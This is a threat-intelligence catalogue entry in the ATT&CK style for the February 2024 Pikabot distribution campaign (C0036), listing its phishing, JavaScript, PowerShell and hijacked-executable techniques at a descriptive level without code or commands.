C0036 Pikabot Distribution February 2024
Pikabot was distributed in Pikabot Distribution February 2024 using malicious emails with embedded links leading to malicious ZIP archives requiring user interaction for follow-on infection. The version of Pikabot distributed featured significant changes over the 2023 variant, including reduced code complexity and simplified obfuscation mechanisms.12
| Item | Value |
|---|---|
| ID | C0036 |
| Associated Names | |
| First Seen | February 2024 |
| Last Seen | February 2024 |
| Version | 1.0 |
| Created | 17 July 2024 |
| Last Modified | 28 October 2024 |
| Navigation Layer | View In ATT&CK® Navigator |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Pikabot Distribution February 2024 passed execution from obfuscated JavaScript files to PowerShell scripts to download and install Pikabot.1 |
| enterprise | T1059.007 | JavaScript | Pikabot Distribution February 2024 utilized obfuscated JavaScript files for initial Pikabot payload download.1 |
| enterprise | T1574 | Hijack Execution Flow | Pikabot Distribution February 2024 utilized a tampered legitimate executable, grepWinNP3.exe, for its first stage Pikabot loader, modifying the open-source tool to execute malicious code when launched.1 |
| enterprise | T1566 | Phishing | - |
| enterprise | T1566.002 | Spearphishing Link | Pikabot Distribution February 2024 utilized emails with hyperlinks leading to malicious ZIP archive files containing scripts to download and install Pikabot.1 |
Software
| ID | Name | Description |
|---|---|---|
| S1145 | Pikabot | Pikabot Distribution February 2024 distributed Pikabot for initial access purposes in February 2024.12 |